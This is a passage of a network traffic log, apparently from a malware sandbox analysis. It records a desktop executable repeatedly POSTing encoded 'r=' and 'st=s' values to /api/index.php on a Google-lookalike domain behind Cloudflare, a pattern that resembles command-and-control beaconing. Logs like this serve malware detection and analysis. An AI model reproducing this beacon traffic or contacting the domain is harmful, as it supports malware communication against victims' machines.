Jan 8, 2025 08:46:57.186420918 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:46:57.840380907 CET	827	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:46:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mSkJzIQ6PBIMoixet9If7dWiAaWtNNQUXQkFffnmhDWi4F1MFpF9wsO8iteYJ%2BfVPU9LKtGb0p%2BsCSvmKN%2BrNu3VV%2Fo0wOqpdtN9nmAXF3dJCu86bgvQV4QWjxwlT%2FidHYtNDgAyTRv0KLgMB0NQ%2FpjFGdguIA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea93a60d6242d2-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1559&min_rtt=1559&rtt_var=779&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.5	50057	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:46:59.476527929 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:47:00.166419029 CET	818	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:47:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A91EEBuXndMqtotwkN4sOZk5qhYoCbGXk4FC7Woc8nu6EgV51sT3Y4o1s1NmVGWDsSAPJI9DPeWrcV7hQM2TjxrdRz7%2BJ1Z222jiPNNYi%2BufqkuR1XBSn1HC7pcVh63r7rac0ybMtFuky1rwLaISf0r1nG%2BTWg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea93b49ae20f36-EWR server-timing: cfL4;desc="?proto=TCP&rtt=19605&min_rtt=19605&rtt_var=9802&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.5	50058	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:47:01.686073065 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:47:02.336062908 CET	821	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:47:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BzqKsnPNINPSbsPjFXK%2F3u2Iax94xZY4C5yQGA6vRatJGP8XPluvt1G6pTOeA6fzuprfj9m51o0f%2FEWIlCSIFse43l7EP0XqeV21rddNpJWJwkuUnErnJsL%2BbJb3AgLDmB3ygDHxyfvseeTjYP5Twb2WBSmtyA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea93c21f088c0f-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1919&min_rtt=1919&rtt_var=959&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.5	50059	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:47:03.967138052 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:47:04.610625029 CET	817	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:47:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=96SAk49qgdvSSOQ7pMhiNo1OAqVL5tAUaRB2aXftDkPVSftXJ5FH6sdoz1PEfZhCDLV6MXlrSmgQPETUbQdw6jQVVVtl4wO%2FK%2BV0btvxGbLlW4aBztDDpXgNBtY9son5y%2FGq7ht33AZ9Yq3xlXCwLJvKH2e8%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea93d06e7d43ee-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1605&rtt_var=802&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.5	50060	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:47:06.138837099 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:47:06.771224022 CET	827	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:47:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GZ9YGQBMmGA88nn2F%2B6C%2B0lSP7R%2F2PVYVgUykuyxf%2Fi8VdsRhG5y0sizXemdmgeLWAqjdeuVyW03vQGNvreLIb%2BO2V29T1kFkcDtyALae7BFxVmhEXxIw8796KdgRHO%2BN7XJbBGiTQmtjeMXn8RoSxxGUMO0Cg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea93dddc0a8c0f-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1990&min_rtt=1990&rtt_var=995&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.5	50061	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:47:08.430006981 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:47:09.056909084 CET	822	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:47:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yRBgYpmyDfAeys7NYeDJdq1K6%2Brq2ZpUP0QPvM3Ypn5WaC88Hc54YKJsSwmB2B9Lw9K3LICcIiQ%2FkzAp0cEujUa2uzoNDPwi9FxGaYG6gLGHao9Q0d9t0l9Y%2F0KtYPogK%2BWoZMtt1i%2BbabW2o1%2FEfASEnKBPcQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea93ec386a7d0e-EWR server-timing: cfL4;desc="?proto=TCP&rtt=2011&min_rtt=2011&rtt_var=1005&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.5	50062	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:47:10.588701963 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:47:11.229614973 CET	823	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:47:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6NYTnSffLPWpNywu7dTGGyDyh2b%2BIa7lMNxPpzR950I0QYSrt79LwKn0ZKTS0zWjRj9aAwvfYTp%2FMfUgd89w0BEqqxtBs2vluMEZSYpTxbBvhZT3eLC8xtmwfGkp7L5nf1LNSbp%2Bf%2FefkRm0IRaVEG6bHXW91Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea93f9b99c0f36-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1443&min_rtt=1443&rtt_var=721&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.5	50063	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:47:12.857634068 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:47:13.491180897 CET	818	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:47:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p5uj47Mh4dRdLq%2BGgzT4q8yXzwC%2BTR9BDGFQ8cy5eEXqQiA0Rmv9bOtsXk6r7nQiNE3h2My8HY25pK48qzrGXGlGnz0sMKenzxp6iLXW%2BblvqjromKscdYo5UxAXcwK9k8ob0DOsJoCs15xUxBzBg5U1%2FmjFkw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea9407db1e7d0e-EWR server-timing: cfL4;desc="?proto=TCP&rtt=2018&min_rtt=2018&rtt_var=1009&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.5	50064	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:47:15.015047073 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:47:15.677457094 CET	823	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:47:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BBObTovG%2FNDhAEm2XIu%2FyyL6WygWo1l54ZEBEyDAo0szseN9PpTVVbKXed1ttrUdw1nWeHh%2BU2R6V2sSet2sitsjUGrMzlU4OKFxMZHJUFYsEXuMrQTReuoSAKUk7MDAS%2FABnhEZDxtVnQIflV21lnptmHmkIw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea94157c4542d2-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1571&rtt_var=785&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.5	50065	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:47:17.311474085 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:47:17.966834068 CET	817	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:47:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GtSLGvVG0QYm7C0985mA03cmN4Fzq7GZW53CvsqxpWDJA%2Bvf46qc2n%2Ft0RxF0Qugal58NynKGq9JDVZNWTEwa0JVeOAX559OkURFm%2Bh6dcz0%2BfqGBpAyLoTOyzC95P6R5rdXiFxs6m1j2rkTrLBgzewneJMHgA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea9423d86d8c0f-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1967&min_rtt=1967&rtt_var=983&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.5	50066	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:47:19.486701965 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:47:20.142399073 CET	823	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:47:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HHtgD23wVkpukEVC6dz6mQWR%2FsXvFwxjgOjZInS4UgCeCN8QQPbiMTX1%2FYAbRBjd0jhng80mymcED4pptjBWwQK6pX6ux83ZuDQpeef0P7Fq6c90155Cmd7pZ6lb%2BHaKeIRVtFkB6b%2Fa4VTVNnMvf0IfccwBlA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea943168037d0e-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1988&min_rtt=1988&rtt_var=994&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.5	50067	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:47:21.779207945 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:47:22.416116953 CET	823	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:47:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bzy1W21AaLt6pkPmDSDrKaKOcn8nqF%2BzxfS79xcfe6bduOxpCHLiF%2B0YGHzuWHQmhiY3nmDBcWqo8375ezSVwaTP%2BS7tMp3eDF8Rfs8XG%2FxTzZvUo6J%2FRMNWcX8rHNm8OqgU863D%2BU8oPjr%2B6fnRQePDo5Xulg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea943fbe5a0f36-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1442&min_rtt=1442&rtt_var=721&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.5	50068	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:47:23.938900948 CET	326	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Jan 8, 2025 08:47:24.585119009 CET	823	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:47:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hz7cccwJ2yloscr9DvB5ThXwmPH4FHW2sQtj1Zc1mmu%2F4LAD7C7fa4m8yHdwppkOPz%2F3Da8Y9xPp7XCXRRnvPtOaMdFD6Gy0%2FRz1g%2BA6ri8vtvkIAZtvm1P4fvg6WPTZhSGnsN2QYMe4jyx5rEOjHktkv1UsuA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea944d3c310f36-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1405&min_rtt=1405&rtt_var=702&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.5	50069	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 08:47:26.236154079 CET	172	OUT	POST /api/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: clientservices.sgoogleapis.observer Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 8, 2025 08:47:26.799917936 CET	821	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 07:47:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1C39SuEYibQChu8jZ28h40lwZoGT7muv4eZP8oIROvFkOhDveiRdDe3wHlf0f2Bw%2BvdmgqSu5xHleCEpVtRSyM%2FPLSh6fsRw4rqI5A8U8Iw3%2F%2BUJ84%2BqkGDREhh%2FElMcvNvyfk6SMss5BdS9sQYGNUXf3BQTaA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fea945b9bb943ee-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1711&min_rtt=1711&rtt_var=855&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.5	50070	104.21.80.1	80	3868	C:\Users\user\Desktop\6uHfmjGMfL.exe

Timestamp	Bytes transferred	Direction	Data
